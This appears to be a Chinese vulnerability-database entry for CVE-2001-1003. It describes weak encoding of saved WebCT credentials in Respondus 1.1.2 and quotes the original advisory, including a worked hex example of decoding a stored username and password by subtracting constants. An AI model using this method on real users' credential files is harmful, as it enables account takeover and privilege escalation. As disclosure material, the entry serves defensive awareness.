WebCT Respondus密码泄露和权限提升漏洞

WebCT Respondus密码泄露和权限提升漏洞

漏洞ID 1106474 漏洞类型 未知
发布时间 2001-08-23 更新时间 2001-08-31
图片[1]-WebCT Respondus密码泄露和权限提升漏洞-安全小百科CVE编号 CVE-2001-1003
图片[2]-WebCT Respondus密码泄露和权限提升漏洞-安全小百科CNNVD-ID CNNVD-200108-169
漏洞平台 Multiple CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/21078
https://www.securityfocus.com/bid/89114
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-169
|漏洞详情
WebCT的Respondus1.1.2存储用户名和密码时使用弱加密,可以读取WEBCT.SVR文件的本地用户可以利用该漏洞译码并获取附加权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/3228/info

Respondus is an application designed to add functionality to WebCT's quiz, self-test and survey tools. WebCT is a commercial e-learning solution.

When a user opts to have Respondus remember the username/password for WebCT access, the information is saved encrypted in a file called 'WEBCT.SRV'. The encrypted value of the username and password are converted to their ASCII values and added to a constant. A hex editor can be used to compare differences between the file before credentials are saved with the version of the file after credentials are saved. The values of the username/password are determined by subtracting the constants in 'WEBCT.SRV' prior to saving the credentials from the new values.

The constants are the same for every version of Respondus and are easily located, which may allow the attacker to forego the step of comparing the old and new versions of 'WEBCT.SRV', if the constants are known.

Successful exploitation of this issue will allow the attacker to access other WebCT accounts, which may lead to elevated privileges or the disclosure of sensitive information. 

C8-EF = userid
F0-117 = password

To see the password in plain text subtract the value shown in the WEBCT.SVR
file with no info saved from the value in the same position in the file
with the info saved. Stop when you reach the point where the values are
equal and the result is therefore 0.

i.e.

(the values after username is remembered:)
C8-EF 8B 88 7C 88 7A 7B 12 0D 13 0E 14 0F 15 10 16 11 17 12 11 13 12 14 13 15 14 16 15 17 16 0D 17 0E 11 0F 12 10 13 11 14 12
(the constants:)
C8-EF 16 15 17 16 11 17 12 0D 13 0E 14 0F 15 10 16 11 17 12 11 13 12 14 13 15 14 16 15 17 16 0D 17 0E 11 0F 12 10 13 11 14 12
75 73 65 72 69 64 0 <- stop
u s e r i d

(the values after the password is saved:)
F0-117 85 74 89 87 8E 84 83 7A 12 17 13 0D 14 0E 15 0F 16 10 17 11 11 12 12 13 13 14 14 15 15 16 16 17 17 0D 11 0E 12 0F 13 10
(the constants:)
F0-117 15 13 16 14 17 15 11 16 12 17 13 0D 14 0E 15 0F 16 10 17 11 11 12 12 13 13 14 14 15 15 16 16 17 17 0D 11 0E 12 0F 13 10
70 61 73 73 77 6F 72 64 0 <- stop
p a s s w o r d
|受影响的产品
WebCT Respondus 1.1.2
|参考资料

来源:BUGTRAQ
名称:20010823Respondusv1.1.2storespasswordsusingweakencryption
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=99859557930285&w;=2

相关推荐: Sendmail Socket Hijack Vulnerability

Sendmail Socket Hijack Vulnerability 漏洞ID 1104503 漏洞类型 Design Error 发布时间 1999-11-05 更新时间 1999-11-05 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享